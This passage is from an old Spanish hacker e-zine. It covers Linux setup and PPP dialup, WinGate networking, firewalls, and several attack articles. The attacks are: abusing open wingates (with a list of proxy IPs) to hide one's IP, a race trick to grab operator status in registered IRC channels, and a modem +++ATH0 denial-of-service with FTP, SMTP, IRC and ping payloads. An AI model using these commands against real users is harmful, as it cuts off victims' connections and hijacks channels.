#/usr/:

  Este  directorio  contiene  todos  los  archivos  empleados  por   las
  aplicaciones  instaladas  en el  sistema y tambi�n  puede contener las
  fuentes  del  sistema (/usr/src/linux) necesarios  para  configurar  y
  recompilar nuestro kernel.

#/usr/X11R6/:

  Aqu�  hay  archivos  del  sistema de ventanas X Window. Dentro de este
  tambi�n hay varios directorios mas como:

  +bin/:
    Se almacenan archivos ejecutables de las aplicaciones y herramientas
    X.

  +doc/:
    Varios documentos sobre X Window.

  +include/:
    Aqu� hay archivos de cabecera necesarios para la programaci�n bajo X
    Window.

  +lib/:
    Bibliotecas de funciones enpleadas en la programaci�n bajo X.

  +man/: P�ginas del manual sobre las herramientas de X.

#/usr/bin/:

  Archivos  ejecutables  de la mayor parte de las �rdenes y aplicaciones
  disponibles en el sistema.

#/usr/dict/:

  Listas de palabras. Son utilizadas por los programas que corrigen  los
  errores ortograficos.

#/usr/games/:

  Archivos pertenecientes a los juegos y otras cosas por el estilo.

#/usr/man/:

  P�ginas del manual en l�nea.

#/var/:

  Datos  variables. Esto  incluye  archivos  temporales,  las  colas  de
  impresi�n y el correo electr�nico  ademas los logs del sistema y de la
  mayor�a de los demonios como por ejemplo el httpd. 

#/var/adm/:

  Contiene  los  logs del  sistema, EL administrador puede utilizar esto
  para ver fallos en el sistema o para detectar intrusos.

#/var/lib:

  Informaci�n sobre el estedo de algunas aplicaciones.

  Estos son los directorios que trae por defecto linux, hay que tomar en
  cuenta  que  depende  del  administrador  esto  puede cambiar como por
  ejemplo la localizaci�n de los diversos demonios del sistema. 


   �����������������������������������ͻ
��͹ Conectando desde Linux a Internet ���������������������͹The Sick B������
   �����������������������������������ͼ

  Voy a intentar  explicar aqu� como  conectarse con Linux a Internet, y
  como  decirle  a nuestro  Linux donde esta el modem. Voy a contar  dos
  sistemas, uno desde el shell y otro des de X. Es un art�culo sacado de
  recogida  de info por la  red, de preguntar  mucho y de mi experiencia
  personal, pues  me  costo dios y ayuda  conectarme desde Linux, aunque
  una  vez  se  ha hecho, veremos  que no es tan dificil como lo pintan.
  Bien, para  empezar  decir  que  Linux  trata  todos los  dispositivos
  hardware  como ficheros. Si  abrimos el  fichero dev/cdrom, veremos lo
  que contiene  el cdrom. Los  puertos series, a los que se conectan los
  modems, tambi�n est�n disponibles en ese directorio.Cualquier PC tiene
  2 puertos serie.

  Normalmente en COM1 va el  rat�n, y en COM2 se puede conectar el modem
  externo.

  Ademas, es  posible  conectar un  modem  interno  en otros dos puertos
  serie COM3 y COM4.

  Aqui pongo un esquema de donde se encuentran en Linux los COM de msdos

MSDOS <<<<<<<<<<<<<<  DEVICE-DISPOSITIVO-<<<<<<<<<<<< PUERTO <<<<<<< IRQ
COM1                   /dev/ttyS0                     0x3f8           4
COM2                   /dev/ttyS1                     0x2f8           3
COM3                   /dev/ttyS2                     0x3e8           4
COM4                   /dev/ttyS3                     0x2e8           3

  A Linux hay que decirle donde encontrar el modem. Esto lo haremos  con
  el  comando  setserial. Para ver  la configuraci�n  de  un  puerto  lo
  hacemos de la siguiente manera:

[root@sick /]# setserial -a /dev/ttyS3
/defv/ttyS3, line 3, UART: 16550A, Port:0x02e8,IRQ:3
Baud_base:115200,close_delay:50,divisor:0
closing_wait:3000,closing_wait2:infinite
Flags:spd_vhi skip_test auto_irq

  Si  tenemos  conectado un modem en el COM4 y no es PugNPlay y mediante
  los jumpers seleccionamos los valores que utiliza la configuraci�n del
  puerto por defecto, en este caso IRQ3, nuestro modem ya esta listo.

  Si en nuestro  modem no esta asi, y debemos utilizar una IRq que no es
  la que trae por defecto, debemos de configurar dev/ttyS3 (o el  puerto
  dondelo hayamos conectado) para  que lo haga con la IRQ que  queramos.
  Esto se hace asi:

setserial -b /dev/ttyS3 irq  port 

  Para terminar con este apartado, decir que en Linux normalmente  en el
  directorio  dev suele disponer  de un fichero llamado dev/modem. Si es
  as�, lo linkaremos al puerto donde tengamos enchufado el modem.

[root@sick /]# ln -s /dev/ttySx /dev/modem

  donde x es  el  puerto  donde  tenemos  el  modem. Mirar  la  tabla de
  equivalencias con el msdos.

        Conectando a Internet:

  Aqu� voy a contar dos maneras de hacerlo, una muy f�cil  desde kppp  y
  otra  haciendo  scripts. Diremos  que  nuestro  nombre  es Sick, y que
  nuestro  proveedor  de  Internet  es  hven.com.ve  tenemos  que  crear
  /etc/ppp/options-hven con el vi el joe, con el editor de kde, como mas
  nos guste. Una vez abierto  con el editor, borramos el lock, si es que
  lo hay, y ponemos esto:

connect"/usr/sbin/chat -v -f /etc/ppp/chat-infovia"
ipcp-accept-remote
:194.224.52.5   (aqui ponemos la direcci�n IP de nuestro proveedor)
crtscts
modem
passive
name Sick@hven
noIPdefault
debug
defaultroute
asyncmap a0000
/dev/modem
115200

  Vamos a ver esto, la opci�n ipcp-accep-remote y la IP aseguran que  se
  realizar�  la  conexi�n aunque  infovia  no  le  facilite  la  IP  del
  proveedor. Aunque  la  podemos  sacar  de win95. Passive  es que  debe
  esperar a recibir datos v�lidos  aunque no reciba  respuesta con modem
  le  indicamos  a  pppd  que  debe  usar linea telef�nica 115.200 es la
  velocidad  m�xima de nuestro puerto, aunque la del modem sea distinta.
  name Sick@hven es nuestra cuenta para autentificaci�n de identidad, el
  password  lo pondremos en PAP, esto lo vemos luego, dev/modem le  dice
  que dispositivo usar, por  eso  lo  hemos  linkado antes al dev/ttySx,
  aunque tambi�n se le puede indicar asi dev/ttySx  ahora  vamos a crear
  el fichero de la opci�n  connect  lo haremos con joe vi kedit.....y le
  escribimos esto:

TIMEOUT 5
""ATZ
OK ATDT901505055    (aqui va el nodo al que llamemos)
ABORT "NO CARRIER"
ABORT BUSY
ABORT "NO DIALTONE"
ABORT WAITING
TIMEOUT 70
CONNECT ""

  Este  fichero le  dice  al modem que si no hay tono  cuelgue, etc.  Le
  tenemos que dar permisos de ejecuci�n, asi que como root hacemos esto:

[root@sick /]# chmod 770 /etc/ppp/chat-infovia

  Bien, ahora editamos etc/resolv.confy a�adimos alli la DNS del nuestro
  proveedor y el dominio

domain hven.com.ve
nameserver 194.224.52.5
nameserver 194.224.52.6     (a veces hay dns primaria y secundaria)

  Podemos mirar las dns en configuraci�n TCP/IP de windous. Ahora  vamos
  y editamos etc/pap-secrets, y lo  llenamos  de  esta manera  "cuenta1"
  *"password" que quede mas o menos as�:

client     server secret     IP addresses
"Sick@hven"	*	"password"

  Bien, ya casi estamos, ahora tenemos que ejecutar el pppd con nuestras
  opciones:

[root@sick /]# pppd file /etc/ppp/options-hven

  y acto seguido abrimos un terminal y tecleamos

[root@sick /]# tail -f var/log/messages

  Ahora, si  todo  marcha  bien, tendr�amos  que  estas  viendo marcado,
  conexi�n, etc...
  Si no  conecta, lo  intentamos  otra  vez,  a  ver  si  es  la maldita
  telefonica, o cantv o la mierda que sea. Tambi�n debemos comprobar que
  los scripts est�n bien.

  Para desconectar:

[root@sick /]# killall pppd

  Bien, esta  era  la manera  mas  laboriosa. Ahora vamos a ver el Kppp.
  Es un sistema muy facil, e incluso  te puede  llevar  los gastos si le
  indicas de que pa�s eres y cuanto vale la hora. Solo  voy  a  comentar
  que hay que poner en cada sitio, pues es muy facil:

Conectar con:   Infoviaplus
Usuario:        Sick@hven
Contrase�a:     *********

        Bien, ahora en configuraci�n:

  Dispositivo del modem:    /dev/ttyS1/      (yo lo tengo en com 2)
  Control de flujo:          crtscts
  Velocidad de conexi�n:      57600
  Use lock file: pulsado
  Timeout del modem: 60 segundos
  en modem:
  Espera por linea ocupada 0 segundos
  lo demas nada
  Opciones varias:
  Timeout del pppd 30 segundos
  y pulsados los siguientes:
  Mostrar reloj en barra de titulo
  desconectar al apagar el server X
  minimizar ventana al conectar.
  En configuraci�n de conexiones:
  En la pesta�a marcado lo siguiente.
  Nombre conexi�n: infoviaplus
  N� de tel�fono: 901505055
  Autentificaci�n: mediante pap
  En la pesta�a direcci�n IP
  Direcci�n IP asignada por el usuario, lo demas nada
  Pesta�a servidor de nombres
  Nombre de dominio: hven.com
  Lista de SDirecciones de servidores de nombres 194.224.52.5
  lo demas nada
  Pesta�a Puerta de enlace
  Puerta  de  enlace por defecto y Asignar la ruta por  defecto hacia la
  puerta de enlace
  Pesta�a script de conexi�n
  Expect
  Y pesta�a coste sin seguimiento de costes.

  Bien, espero que  este texto le sirva a alguien para hacerle m�s f�cil
  la  conexi�n  a Internet. Gracias a los listeros y a  Sromero  por  su
  helping hand cuando le pedi ayuda. 

        The Sick B.

   ����������ͻ
��͹ Wingates �������������������������������������������������͹Supreme������
   ����������ͼ

  Bueno �ltimamente e estado experimentando con wingate y me e informado
  un poco de que son y como las podemos usar.

  Aqui le doy un peque�o documento donde explico lo que averigue. 

  Wingate  es un software  que permite a varias computadoras de una  LAN
  conectarse a internet con una sola cuenta.

  INTERNET----M�quina con wingate----las otras m�quinas de la empresa.

  Ahora  voy  a  explicar un poco como se instala una wingate en nuestra
  Lan:

  Primero  que  todo para instalar una wingate tenemos que tener una LAN
  o Local Area Network, ya muchos de ustedes sabran configurarla pero no
  esta de m�s recordarlo:

  Antes  de  instalar  la  wingate  hay  que  configurar las m�quinas, a
  continuaci�n  les  explicare  la configuraci�n  de la m�quina que va a
  ser instalada la wingate. Se recomienda que sea la mejor m�quina en la
  red.

  Bueno  nos  vamos a Configuraci�n,  Panel de control y hay pulsamos el
  icono de Red. Ahora  tenemos que pulsar las propiedades de TCP/IP pero
  no  la  de  su adaptador  de  acceso  telef�nico a redes  si no la que
  tengamos asignadas para la tarjeta de red. 

  Cuando  entremos  en  la  configuraci�n  de  este  nos  va a salir una
  pantalla que dice DIRECCION IP, aqu� tendremos que  colocar donde dice
  direcci�n IP una que o exista en internet como por ejemplo 192.168.0.1
  y donde dice MASCARA DE SUB RED ponemos 255.255.255.0 

  En la pesta�a de CONFIGURACION WINS la debe tener desactivada.

  Lo de GATEWAY ni lo toques jeje y lo mismo con lo de Bindings  tambi�n
  con Advanced o avansado.

  Bueno  esto  es  todo  que  hay  que configurar en esta m�quina, ahora
  configuraremos las workstation o estaciones de trabajo.

  Hay que ir a panel de control despu�s el  �cono de red. Nos va a salir
  una ventana  de  di�logo, hay un bot�n que dice agregar y lo pulsamos.
  Va a salir otra ventana y sombreamos donde dice protocolo, despues  va
  a salir otra ventana y al lado izquierdo sombreamos microsoft  y a  la
  derecha donde dice TCP/IP y le damos OK.

  Bueno  ahora  hay que configurarlo, para eso vamos a panel de control,
  red  y sombreamos  donde  dice  TCP/IP y le  damos  configurar.  En la
  pesta�a  donde  dice  direci�n  IP  tenemos  que  tener activada la de
  especificar una direci�n IP, entonces donde dice direcci�n IP  tenemos
  que  ponerle  un  n�mero  m�s de la que  pusimos  en la m�quina con la
  wingate, si me hiciste caso puedes poner  192.168.0.2 ya que la PC con
  la wingate debe  tener 192.168.0.1. Cada worstation debe  tener una IP
  diferente  entonces la pr�xima worstation debe tener de IP 192.168.0.3
  y as� sucesivamente.

  En la parte que dice m�scara de subred tenemos que poner 255.255.255.0  

  Ahora  en  la  pesta�a  de  configuraci�n wins debe estar desactivada,
  gateway la dejamos as� y lo mismo con avanzada y Bindings.

  En  configuraci�n  DNS  donde  dice  host  ponemos  el nombre  el cual
  queremos  que  sea  reconocida  nuestra  PC en nuestra lan, donde dice
  dominio lo dejamos en blanco. En  orden  de  busqueda del servidor dns
  ponemos el IP que le asignamos a la m�quina con la wingate

  Hay  que  crear  un  archivos  host, este lo podemos  crear un bloc de
  notas, lo �nico que debe tener este es el IP de la wingate y su nombre,
  se debe parecer mas o menos a esto

192.168.0.1 wingate 

  Este archivo lo guardamos en el directorio \windows en windows 98 o 95
  pero  en NT lo  guardamos en \win\system32\drivers\etc este archivo lo
  llamaremos  host y lo debemos guardar sin ninguna extenci�n,  para hay
  que poner en nombre entre comillas y ponerle un punto al final.

  El pr�ximo paso es verificar nuestra LAN, para esto hacemos ping desde
  cada  worstation a nuestra m�quina con la wingate. Abrimos una ventana
  en DOS y colocamos:

ping (IP de la wingate) 

  Si  obtenemos  una  respuesta es que todo esta bien, pero si obtenemos
  algo como esto Request timed out o algo asi hay que  verificar todo de
  nuevo. En caso de que nos de alg�n error  no esta de mas verificar los
  cables y demas cosas de la LAN. 

  Bueno como ya tenemos todo configurado es hora de instalar la wingate,
  pero estoy lo voy a explicar en el pr�ximo art�culo jejeje. Pero ahora
  voy a explicar el lado UNDERGROUND de las wingate =)


  Casa cosa  tiene  su  lado malo, y las  wingate no se escapan de esto,
  como todo hacker  nosotros no aprovehcaremos de malas configuraciones,
  administradores medio lamers y de versiones de wingate viejas.

  Bueno nosotros podemos aprovecharnos de las wingates mal configuradas,
  versiones viejas y otras cosas pero hacer estas dos cosas:

  - Para ocultar nuestro IP en el IRC.

  - Para ocultar nuestro IP en una conexi�n telnet.

  Claro que no en todas  las wingate funcionan porque  como ya dije esto
  se debe a malas configuraciones y cosas as�, pero de todas maneras voy
  a explicarlo por que no esta de mas un poco mas de conocimiento: 
 
        PARA OCULTAR NUESTRO IP VIA TELNET

  Nos  conectamos a la wingate por el puerto 23 y recibiremos algo  como
  esto:

WinGate>

  Entonces nosotros escribimos

WinGate> victima.com 23

  As�  cuando  nos conectamos a victima.com  saldra el IP de la wingate.
  O  sea  que  estaremos  haciendo  una  especie  de  condon   para  asi
  protegernos un poco.
 
  Hay que tener en cuenta que nuestro IP real se puede averiguar por que
  si  hacemos  algo  malo  en  victima.com  est� le  puede  solicitar la
  informaci�n a la wingate. 

        PARA OCULTAR NUESTRO IP EN EL IRC

  Yo vi 2 formas  de  utilizar una wingate para ocultar nuestra IP en el
  IRC, la primara es:

  - Yo lo prob� con el mIRC y ve a file/option y hay  una  cosa que dice
    firewall, donde dice hostname pon la IP de la wingate y pon use sock 
    firewall. 

  Esa es la primera opci�n, la segunda me la dio teken y esta es:

  Estando en nuestro cliente IRC, en la barra de status escribimos:

/server IP-wingate 23

  Luego se conectar� la IP del Wingate, escribimos entonces:

/quote irc.server.com puerto 

  Luego  se  conectar�  al  servidor  IRC, ahora  tenemos  ke decirle al
  servidor cual sera nuestra identidad:
  [ Tienes que hacerlo r�pidamente, si no se corta la conexi�n ]

/quote usuario 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

  Y por ultimo:

/quote nickname tu_nick 

  y estar�s conectado.....

  Esto  nos  sirve  a la  hora  de poner un clon en un canal, por que si
  hacemos esto no detectar� los clones..

  Bueno  ahora le doy una  lista de wingate  las que se pueden conectar,
  aunque no siempre est�n online.

207.172.138.145
203.108.5.62
203.108.5.69
193.252.178.11
206.26.104.1
202.138.8.25
202.138.8.28
203.30.61.73
203.30.61.211
203.30.61.205
207.135.128.109
208.154.103.68
209.122.45.11 
207.96.8.242 

  Bueno  espero  que  est�n atentos de cuando salga el segundo n�mero de
  este art�culo donde explicare la instalaci�n de la wingate. espero que
  les sirva de algo esto.

  Gracias a teken por escribir el art�culo de como conectarse en el  IRC
  de  modo  dificil  jejejeje  a  oscar  por  ayudarme  con  la parte de
  configuraci�n. Un especial saludo a todos los panas de HVen.


   �����������������������������������������������ͻ
��͹ Como Obtener OP en Canales Registrados de IRC ������������͹TecDATA������
   �����������������������������������������������ͼ

                TecDATA (Montevideo - Uruguay) A�o 1999

  En este art�culo les voy a explicar tres formas para ser OP en canales
  registrados en IRC en los cuales este funcionado ChanServ.

  ACLARACION!!!!!!
  ---- Para que esto funcione no tiene que haber nadie en el canal ;)

  1.- LA TEORIA:

  Cuando  entramos  a  un  canal  de  IRC  que  este registrado mediante
  ChanServ, si no estamos en la lista de AOP de ese canal el ChanServ no
  nos va a dar el OP, la cual esta lista de AOP la puede definir el  que
  sepa el password del canal, pero si entramos a un canal no  registrado
  (un canal que nosotros creamos en el momento /join #NombreNoExistente)
  tenemos OP. El OP nos lo da el  servidor desde el  cual nos conectamos
  porque as� podremos  registrar el canal y hacer un  mantenimiento  del
  mismo. Aca es  donde esta  todo o casi todo el secreto para obtener OP
  en un canal  registrado porque  cuando  entramos  a  uno  de  ellos el
  servidor desde donde  nos  conectamos  nos  da  OP  pero  ChanServ nos
  saca el OP por lo anteriormente dicho.

  Y  que  pasar�a  si  entrara  con un  clon al mismo tiempo al canal???
  Dependiendo  de lo que  tarde el servidor en responder o el "LAG"  que
  haya tendr�amos por unos instantes OP  con los dos  Nicks el Clon y el
  NoClon  pero  como  siempre  interponi�ndose  entre  nosotros esta  el
  ChanServ  frustrando nuestros  intentos y hay  veces  que  no  solo el
  ChanServ  nos  saca  el  OP  sino  que es  servidor  al  cual  estamos
  conectados tambi�n.

  Y si  entramos  a un canal y  antes de que ChanServ  o el servidor nos
  quite el OP entramos con el Clon?
  Tendr�amos por un instante esta situaci�n: Nick_Original = OP
                                               Nick_Clon = Usuario comun

    1.1 - AQUI ES DONDE VIENE EL PRIMER METODO ----

        Mientras somos OP con el Nick_Original  le damos OP al Nick_Clon
        entonces  el ChanServ le saca el OP  al Nick_Original pero ahora
        tenemos OP con  el Nick_Clon y el ChanServ no chilla para  nada,
        porque  con  el  Nick_Clon  hab�amos  entrado  despu�s  que   el
        Nick_Original.

    1.2 - ESTE ES EL SEGUNDO METODO ----

        En este  m�todo  no necesitamos darle OP al Nick_Clon  porque el
        servidor se va a encargar de eso. Aqu� si  tenemos  que  usar un
        servidor  lento  para que  cuando entremos al  canal  registrado
        parezca   que   no   hay   nadie  cuando  en  realidad  est�  el
        Nick_Original por otro  servidor, pero como  el  servidor  en el
        cual tenemos el Nick_Clon es lento  cuando  entramos tenemos  OP
        porque todav�a  no  le  llego a este  servidor que el canal est�
        registrado, entonces cuando  detecta  que es un canal registrado
        aparecen  los dos Nicks. Lo que ha pasado durante  este  momento
        con el Nick_Original mientras el servidor del Nick_clon le envia
        los datos (en este caso) a DALNET de que entramos a un canal, es
        que el ChanServ le quita el OP al Nick Original  pero  cuando el
        servidor termina de mandar  los datos aparecemos en el canal con
        el Nick_Clon como OP.
        Este m�todo ser�a como si pasara un  NetSplit con lo cual cuando
        nos unimos al la RED aparecemos como OP.

        NetSPlit EXPLICACION - Si ya  sabes  lo  que  es  salteate  este
        p�rrafo :) Un  NetSplit ocurre cuando uno de  los servidores  se
        cae de la RED en este caso DALNET con lo cual todas las personas
        que est�n conectados por ese servidor tambi�n se van a caer.
        Lo  contrario  de  NetSplit es  un  NetJoin  y supongo que no es
        necesario explicarlo. XDD

    1.3 - SE VIENE EL TERCER METODO ----
        Este m�todo no  es de creaci�n propia sino que fue comentado por
        "Teken Melocotoff".
        Esta otra forma se puede hacer sin tener que usar un clon porque
        lo que hay  que  hacer  es buscar un servidor lento y cuando nos
        conectamos entramos al canal registrado, el servidor nos da OP y
        mientras lo  tenemos OP nos  mandamos  muchas  ordenes  de  OP a
        nosotros mismos, entonces  cuando  el  ChanServ  nos saque el OP
        vamos a recibir datos de que  nos  den  OP de un Nick que era OP
        osea nosotros mismos.

  ----  Luego de todo este rollo te�rico vamos a lo interesante

  2 - LA PRACTICA!!!! 
    2.1 - AQUI ES DONDE VIENE EL PRIMER METODO ---- 

      [Con el Nick_Original ponemos] /join #CanalRegistrado 
      *** servidor.X sets mode: +o Nick_Original
      *** ChanServ sets mode: -o Nick_Original
      [Con el Nick_Clon ponemos] /join #CanalRegistrado
      [Con el Nick_Original ponemos] /mode #CanalRegistrado +o Nick_Clon
      *** Nick_Original sets mode +o Nick_Clon

    2.2 - ESTE ES EL SEGUNDO METODO ----

      [Con el Nick_Original ponemos] /join #CanalRegistrado 
      *** servidor.X sets mode: +o Nick_Original
      *** ChanServ sets mode: -o Nick_Original

      [Con el Nick_Clon ponemos] /join #CanalRegistrado
      *** servidor.X2 sets mode: +o Nick_Clon

    2.3 - SE VIENE EL TERCER METODO ----
      [Con el Nick_Original ponemos] /join #CanalRegistrado 
      *** servidor.X sets mode: +o Nick_Original
      [Con el Nick_Original ponemos] /mode #CanalRegistrado +o Nick_Original
      [Con el Nick_Original ponemos] /mode #CanalRegistrado +o Nick_Original
      [Con el Nick_Original ponemos] /mode #CanalRegistrado +o Nick_Original
      [Con el Nick_Original ponemos] /mode #CanalRegistrado +o Nick_Original
      ...
      Y asi hasta que el ChanServ nos saque el OP
      ...
      *** ChanServ sets mode: -o Nick_Original
      *** Nick_Original sets mode +o Nick_Original

-------- EL FIN

POR COMENTARIOS, CRITICAS Y DEMAS EL EMAIL ES 
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

   ��������������������ͻ
��͹ FireWalls en Linux ���������������������������������������͹DoctorX������
   ��������������������ͼ

  Como parte de los intentos por resguardar las redes en inet se crearon
  los firewalls que consisten en reglas de manejo de manejos de paquetes
  que pueden ser utilizadas en un router para  proteger  a  una LAN o en
  una estaci�n para resguardarla del resto de inet. En los Protocolos de
  la Capa IP la informaci�n se maneja utilizando parte del Encabezado de
  los Paquetes (UDP o TCP) para colocar  la  informaci�n  tanto de IP  y
  puerto  origen,  y  la  informaci�n  de  IP  y  puerto  destino,  esta
  informaci�n es manejada por los routers en cada camino intermedio para
  determinar  las  rutas  a  seguir  hasta  su origen. Basado en esto se
  fundan los firewall, siendo  utilizados  para restringir los servicios
  en  una  red y el  acceso a la misma. En este punto podemos decir  que
  para  linux se  pueden  realizar  este tipo de  filtrado  de  paquetes
  utilizando  dos  programas de libre distribuci�n que son ipfwadm y  el
  ipchains, siendo el primero para los kernels de  la  serie del 2.0.x y
  el segundo para los kernels del 2.1.x en  adelante, un  ejemplo  de su
  uso podr�a ser el siguiente:

  Supongamos que tengo una red de IP xxx.xxx.xxx.xxx y yo deseo eliminar
  el acceso desde la maquina eee.eee.eee.eee al servicio  de FTP  de  mi
  red, entonces para ello realizo lo siguiente:

  con ipfwadm:

# ipfwadm -F -p deny -P tcp  -s eee.eee.eee.eee -d xxx.xxx.xxx.xxx 21

  con ipchains:

# ipchains -A forward -j DENY -s eee.eee.eee.eee -d xxx.xxx.xxx.xxx :21 -p tcp
 
  ahora  supongamos  que  no  deseo  que  mis  maquinas  respondan a los
  mensajes ICMP provenientes desde inet:

  con ipfwadm:
# ipfwadm -F -p deny -P icmp -d xxx.xxx.xxx.xxx

  con ipchains : 
# ipchains -A forward -j DENY -d xxx.xxx.xxx.xxx -p icmp

  Existen otras  formas  de  realizar filtrado y es restringiendo ademas
  del origen y destino, es  utilizar  los  FLAGS  de los encabezados TCP
  algunos de los cuales son:

  SYN   - Flags  que indica que es un paquete para sincronizaci�n  antes
          de establecer una comunicaci�n.

  FYN   - Indica  que  ese  paquete  es  el  �ltimo  en  la secuencia de
          comunicaci�n.
                     
  RESET - Este paquete transporta la orden de detener la comunicaci�n.

  URGEN - Indica  que  el paquete es un paquete urgente,  este  tipo  de
          paquetes son usualmente los paquetes reenviados. 

  Las  caracter�sticas  de  estos  flags  son  aprovechados  por algunos
  scanner de puertos como  el  conocido  nmap  de  Fyodor  para  extraer
  informaci�n  pasando  por  alto  un  firewall,  por  ello  metodos  de
  filtrados  mas  complejos  se  han  implementado  para  no permitir el
  paso de  paquetes  de este  tipo principalmente  los SYN, de manera de
  resguardar  mejor  las  m�quinas  de  la  Red  Interna  y proteger  la
  informaci�n encerrada por ellas.

DoctorX   
 Esta dirección electrónica esta protegida contra spam bots. Necesita activar JavaScript para visualizarla
 

   ������������������������������������������ͻ
��͹ Mini How to de Firewalls en Win NT/95/98 ������������������͹Merlin������
   ������������������������������������������ͼ

  Bueno has escuchado de los Firewall son esas m�quinas que filtran todo
  lo  que  entra  en  una Lan de cualquier empresa grande aunque tambi�n
  existen  softwares que  hacen  lo mismo, usualmente  los cortafuegos o
  firewall se encuentran en grandes m�quinas corriendo Linux (o Unix)  y
  NT se utilizan para filtrar gran cantidad de paquetes que vienen de la
  red y tambi�n que salen de ella, por  ejemplo un admin puede  bloquear
  puertos  para los paquetes de los  troyanos (31337 para  el BO 1.2 por
  ejemplo) y ataques  con nukes ICMP (Internet Control Message Protocol)
  de esta  manera  estos  no  pasan y no   pueden entrar en Lan, tambi�n
  podemos estar en  Windows y para  evitar los  molestos  nukes  podemos
  instalar  un firewall  para  bloquear el paso  de  ciertos  paquetes y
  protocolos (TCP o UCP)

        �C�mo podemos instalar un Firewall en Windows?

  Existen   bastantes    programas   que   cumplen   con   el   trabajo,
  www.download.com es un buen punto  para buscar pero yo  principalmente
  voy a comentar  el funcionamiento de  Conseal PC Firewall 1.35 que  se
  encuentra  disponible  en  www.signal9.com,  este  firewall  corre  en
  background y funciona  como  todo  los firewall mediante unos archivos
  que contienen  las  reglas  del  cortafuegos,  la  instalaci�n  trae 4
  archivos  de  reglas, seg�n  el  nivel  de  protecci�n que necesitemos
  aunque  lo  mejor  es  hacer  uno desde cero para adaptarlo a nuestras
  necesidades

        Rules

  Estos archivos definen todo lo que esta permitido y no permitido pasar
  en  nuestra  m�quina, en  conseal  estos  archivos  terminan  por  fwr
  (firewall  rules),  para  cambiar  de  juego  de reglas tenemos que ir
  a file/change  ruleset file y para  configurarla  vamos  Rules,  ahora
  tenemos dos pesta�as.

  - Control: aqu�  estan  las  opciones  que nos permiten especificar un
    password (recomendado) para  que  nadie  m�s  que  nosotros  podamos
    cambiar  la  configuraci�n  de  las  reglas,  aunque  no  le  veo la
    seguridad  a  eso  ya  que  podemos  cambiar  el  archivo  de reglas
    completo, donde esta la seguridad??? para solucionar esto deber�amos
    tener un solo archivo fwr, ademas aqu� podemos  especificar  si  las
    reglas  se  aplicar�n  a  todas  los dispositivos  de red o cada uno
    tendra una configuraci�n separada, esto es muy util para las  redes,
    ya que  podemos  tener una  configuraci�n determinada para la inet y
    otra para la red Interna.

  - All network Devices (o el nombre  del adaptador  en caso de tengamos
    activadas las reglas para cada dispositivo): aqu� tenemos una opci�n
    interesante que automatic rule learning que  consiste en un  sistema
    que esta  pendiente  de una nueva comunicaci�n  que  no se encuentra
    en su rules set y pregunta se la debe bloquear o permitir

  En advanced podemos bloquear  o permitir  cualquier otro protocolo que
  no tengamos que sea TCP/IP como IPX o NetBEUI

  Bueno para  agregar alg�n  servicio basta con pulsar add y seleccionar
  el dispositivo de red al  cual le  sera aplicada la nueva regla, luego
  especificamos  el servicio (HTTP, POP; SMTP, IRC, etc.), el  protocolo
  (TCP/IP, UDP/IP,  etc.), Inbound  o  Outbound  seleccionaremos  se  no
  permitiremos conexiones  al puerto 80 desde internet y el contrario o
  ambas, tambi�n  podemos especificar direcciones espec�ficas  locales o
  remotas que no deseamos que puedan pasar por la firewall.

        Otros programas

  Tenemos tambi�n programas  que cumplen  las funci�n de proxys/firewall
  como Consocks y Winproxy que son bastante buenos.

        Consocks 

  Este programa esta disponible en www.linkbyte.com., puede compartir la
  conexi�n de inet con las x maquinas que est�n conectadas a la red este
  programa mas que todo esta destinado a peque�as redes que no requieran
  mucha seguridad ni un gran software de filtrado de paquetes.

        WinProxy

  Este programa es bastante robusto, como Consocks no permite el tr�fico
  hacia la Lan y permite  filtrar  comandos intrantes/salientes  en  los
  distintos servicios, tambi�n permite la funci�n de log, en  fin  es un
  muy  buen  programa   proxy  para  NT/95/98  lo  pueden  conseguir  en
  http://www.winproxy.com


   ����������������������������������������ͻ
��͹ Denial of Service attack contra modems ��������������������͹TiT0_C������
   ����������������������������������������ͼ

  Este es un DoS de  la "vieja guardia" ya que es bastante viejo pero no
  se ha hecho nada para arreglarlo.
  Todo sistema que utilize una conexi�n "dialup" y tenga  un  modem cuyo
  chipset utilize los comandos Hayes (ATZ, ATDT, ATH0..) es vulnerable a
  este DoS. Si el atacante  puede obligar al modem a que responda con el
  string +++ATH0 hay  muchos  de estos  que pueden interpretar esto como
  que  el  usuario  esta  usando  el  comando  de  colgar  o terminar lo
  comunicaci�n manualmente y por  lo tanto  cuando el modem responda con
  este  string  lo  ve  en  el  datagrama IP y causa que este termine la
  comunicaci�n. El problema  afecta a los modems con un chipset Rockwell
  o Lucent.

  No todos los modems se ven afectados ya que hay unos que obligan a que
  haya  un tiempo de  espera  antes  de  mandar  cualquier  texto  en la
  respuesta al comando +++. Por lo tanto es imposible  que estos  modems
  se cuelguen. Estos modems no  vulnerables  desafortunademente  no  son
  muchos y una de las pocas  marcas que no se  ve afectada por esto  son
  los  modems US Robotics  que  son los  que "obligan" la  pausa  de  un
  segundo mas o menos ante el comando +++.

  Hay  varias formas de hacer que la v�ctima te responda con el +++ATH0:

  1) Conectarse  al  FTP  de  la  v�ctima  y  escribir   "USER +++ATH0".
     Normalmente  esto  ocasionar�a  que  el  FTP  pida password para el
     usuario  +++ATH0,  pero  cuando   el  modem  ve  +++ATH0  este   se
     desconecta.

  2) Conectarse a Sendmail, mandar "HELO victima.com",  despues escribir
     "VRFY +++ATH0". Normalmente esto te dir�a que el usuario +++ATH0 no
     existe pero ocurre lo mismo que en el primer ejemplo.

  3) El  comando  para IRC : Ya  que no se  puede hacer simplemente /msg
     v�ctima +++ATH0, se utiliza /raw NOTICE victima: $+ $chr(1) $+ PING
     +++ATH0 $+ $chr(1)

  4) Se  puede  utilizar  el  ping  para mandar un datagrama ICMP con el
     +++ATH0 en el. Para esto se utiliza:

        ping -p 2b2b2b415448300d xxx.xxx.xxx.xxx

  Donde  ping es el comando que todos conocemos, -p es  el  switch  para
  permitir especificar hasta 16 bytes  para  mandar con el packet lo que
  nos  permite  mandar  el  2b2b2b415448300d que  es simplemente +++ATH0
  escrito en  hexadecimal  ya que el -p solo permite  valores en d�gitos
  hexadecimales y por ultimo xxx.xxx.xxx.xxx que  es la direcci�n de  la
  v�ctima.

  Notese que la opci�n -p no se  encuentra  bajo el ping normal que trae
  MS-DOS.

==============================>PRUEBAS<=================================

  JEJE ahora viene la parte interesante.
  Vamos a probar las diferentes  formas de  llevar a cabo este DoS. Esto
  fu� bastante dificil debido a que no encontre ning�n  modem con  qui�n
